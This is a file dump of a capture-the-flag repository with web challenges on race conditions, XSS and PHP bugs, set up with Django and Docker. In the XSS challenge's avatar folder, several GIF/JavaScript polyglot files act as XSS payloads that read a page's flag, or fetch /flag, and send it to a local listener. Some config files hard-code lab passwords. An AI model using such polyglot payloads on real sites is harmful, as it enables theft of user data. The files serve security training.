/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.woff -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.woff2 -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-race1/app/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | 3 | Disallow: /flag.php 4 | Disallow: /setup.php 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-race1/app/test/test.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/test/test.zip -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-race1/app/test/test1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/test/test1 -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-race1/app/test/test1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/test/test1.zip -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-race1/scripts/init.sql: -------------------------------------------------------------------------------- 1 | CREATE DATABASE IF NOT EXISTS `race1` CHARACTER SET UTF8; 2 | 3 | CREATE USER race1@localhost IDENTIFIED BY 'race1@mysqlTYUVNM'; 4 | 5 | GRANT ALL PRIVILEGES ON race1.* TO race1@localhost; 6 | 7 | FLUSH PRIVILEGES; 8 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/init.sh: -------------------------------------------------------------------------------- 1 | python manage.py collectstatic --noinput 2 | python manage.py makemigrations 3 | python manage.py migrate 4 | python manage.py initate_database 5 | python manage.py runserver 0.0.0.0:8000 6 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/nginx/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM nginx/latest 2 | RUN rm /etc/nginx/sites-enabled/default 3 | ADD sites-enabled/ /etc/nginx/sites-enabled 4 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/scripts/init.sql: -------------------------------------------------------------------------------- 1 | CREATE DATABASE IF NOT EXISTS `xss1` CHARACTER SET UTF8; 2 | 3 | CREATE USER xss1_user@localhost IDENTIFIED BY 'xss1_user@pass'; 4 | 5 | GRANT ALL PRIVILEGES ON xss1.* TO xss1_user@localhost; 6 | 7 | FLUSH PRIVILEGES; -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/scripts/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | service mysql start 3 | service nginx start 4 | cd /app && gunicorn website.wsgi --bind 0.0.0.0:8000 & 5 | while true; do 6 | python /app/manage.py check_profiles 7 | sleep 1 8 | done -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/.idea/markdown-exported-files.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/.idea/markdown-navigator/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/Dockerfile: -------------------------------------------------------------------------------- 1 | # Dockerfile 2 | FROM python:2.7 3 | WORKDIR /website 4 | COPY . . 5 | COPY manage.py requirements.txt /app/ 6 | RUN pip install -r requirements.txt 7 | EXPOSE 8000 8 | #CMD ["python", "manage.py", "runserver", "0.0.0.0:8000"] 9 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/__init__.py -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/app_settings.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from django.conf import settings 3 | 4 | 5 | ADMIN_USERNAME = getattr(settings, 'ADMIN_USERNAME', 'admin') 6 | ADMIN_PASSWORD = getattr(settings, 'ADMIN_PASSWORD', 'RRLgahscjbvARWVF') 7 | BASE_URL = getattr(settings, 'BASE_URL', 'http://127.0.0.1:8000') 8 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/apps.py: -------------------------------------------------------------------------------- 1 | from django.apps import AppConfig 2 | 3 | 4 | class AppConfig(AppConfig): 5 | name = 'app' 6 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/management/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/management/__init__.py -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/management/commands/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/management/commands/__init__.py -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/migrations/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/migrations/__init__.py -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.eot_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.eot_ -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.eot_v=4.3.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.eot_v=4.3.0 -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.ttf_v=4.3.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.ttf_v=4.3.0 -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.woff2_v=4.3.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.woff2_v=4.3.0 -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.woff_v=4.3.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.woff_v=4.3.0 -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Bold-web.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Bold-web.ttf -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Bold-web.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Bold-web.woff -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Light-web.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Light-web.ttf -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Light-web.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Light-web.woff -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.eot_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.eot_ -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.woff -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.woff2 -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/img/no-menn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/img/no-menn.png -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/templatetags/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/templatetags/__init__.py -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/templatetags/app_tags.py: -------------------------------------------------------------------------------- 1 | from django import template 2 | 3 | register = template.Library() 4 | 5 | 6 | @register.filter(name='addclass') 7 | def addclass(value, arg): 8 | return value.as_widget(attrs={'class': arg}) 9 | 10 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/app/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/avatar/test.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/avatar/test.jpg -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/empty.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/empty.jpg -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test.gif: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0;var a=2; alert(a); -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test.js: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0;var a=2; alert(a); -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test.py: -------------------------------------------------------------------------------- 1 | print('here') -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_0GWwxOT.gif: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0;var flag = document.getElementById('flag').textContent; 2 | document.location = 'http://localhost:8001/' + flag; -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_7zFsDhg.gif: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0;var flag = document.getElementById('flag').textContent; 2 | document.location = 'http://localhost:8001/' + flag; -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_APyOfLm.gif: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0;document.location="http://localhost:8001/fdsfdsfdsfdfds" -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_B80PliW.gif: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0;var a=2; alert(a); -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_BfFj8MW.gif: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0;var xhr = new XMLHttpRequest(); 2 | xhr.open('GET', '/flag'); 3 | xhr.onload = function() { 4 | if (xhr.status === 200) { 5 | document.location = xhr.responseText; 6 | } 7 | }; 8 | xhr.send(); -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_NeifzZ3.gif: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0;var a=2; alert(a); -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_Z8O46N0.gif: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0;var xhr = new XMLHttpRequest(); 2 | xhr.open('GET', '/flag'); 3 | xhr.onload = function() { 4 | if (xhr.status === 200) { 5 | document.location = xhr.responseText; 6 | } 7 | }; 8 | xhr.send(); -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_c9sWenV.gif: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0;document.location="http://localhost:8001/fdsfdsfdsfdfds"; -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_fjTRkgM.js: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0;var a=2; alert(a); -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_nAAq7iu.gif: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0; -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_osvKkTn.gif: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0; -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_vrikRjT.gif: -------------------------------------------------------------------------------- 1 | GIF89a/*.......*/=0;var a=2; alert(a); -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/requirements.txt: -------------------------------------------------------------------------------- 1 | Django==1.11 2 | django-csp==3.3 3 | django-ranged-response==0.2.0 4 | django-simple-captcha==0.5.6 5 | MySQL-python==1.2.5 6 | Pillow==5.0.0 7 | pytz==2017.3 8 | selenium==3.8.1 9 | six==1.11.0 10 | gunicorn 11 | requests 12 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/README.txt: -------------------------------------------------------------------------------- 1 | Roboto webfont source: https://www.google.com/fonts/specimen/Roboto 2 | Weights used in this project: Light (300), Regular (400), Bold (700) 3 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/Roboto-Bold-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/Roboto-Bold-webfont.woff -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/Roboto-Light-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/Roboto-Light-webfont.woff -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/Roboto-Regular-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/Roboto-Regular-webfont.woff -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/img/tooltag-arrowright.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/js/cancel.js: -------------------------------------------------------------------------------- 1 | (function($) { 2 | 'use strict'; 3 | $(function() { 4 | $('.cancel-link').click(function(e) { 5 | e.preventDefault(); 6 | window.history.back(); 7 | }); 8 | }); 9 | })(django.jQuery); 10 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.eot_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.eot_ -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.eot_v=4.3.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.eot_v=4.3.0 -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.ttf_v=4.3.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.ttf_v=4.3.0 -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.woff2_v=4.3.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.woff2_v=4.3.0 -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.woff_v=4.3.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.woff_v=4.3.0 -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Bold-web.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Bold-web.ttf -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Bold-web.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Bold-web.woff -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Light-web.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Light-web.ttf -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Light-web.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Light-web.woff -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.eot_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.eot_ -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.woff -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.woff2 -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/static/app/img/no-menn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/img/no-menn.png -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-xss1/website/website/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/website/__init__.py -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/supereasy-phpbug1/README.md: -------------------------------------------------------------------------------- 1 | # PhpBug! 2 | 3 | ## level: **supereasy** 4 | 5 | Easy Apache related challenge. 6 | 7 | to run challenge do this: 8 | 9 | ```docker 10 | docker build -t phpbug1 . 11 | docker run -d -p 8000:80 phpbug1 12 | ``` 13 | 14 | and access challenge through browser with this address: ```http://localhost:8000``` 15 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/supereasy-phpbug1/app/source.php: -------------------------------------------------------------------------------- 1 | 999999) 6 | echo "flag_XXX"; 7 | } 8 | } 9 | } 10 | ?> 11 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/README.md: -------------------------------------------------------------------------------- 1 | APA-IUTcert CTF: 2 | -- 3 | Third CTF held by APA-IUTcert... it was a local ctf for just iranian users & they could access to portal and challenges only by using proxy. 4 | 5 | CTF was held for 15 hours 6 | 7 | This direcotry contains solutions/sources codes of Web challenges(cause i was in charge of them) -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/accesslog/access.log.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/accesslog/access.log.zip -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/helloadmin/sourcefiles/logout.php: -------------------------------------------------------------------------------- 1 | $value ) 7 | { 8 | setcookie( $key, $value, $past, '/' ); 9 | } 10 | header("Location: login.php");//use for the redirection to some page 11 | ?> -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/hijacked.pcap.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/hijacked.pcap.pcapng -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/1.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/images/10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/10.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/images/11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/11.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/images/12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/12.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/2.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/3.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/4.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2015/hijacked/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/hijacked/images/5.png -------------------------------------------------------------------------------- 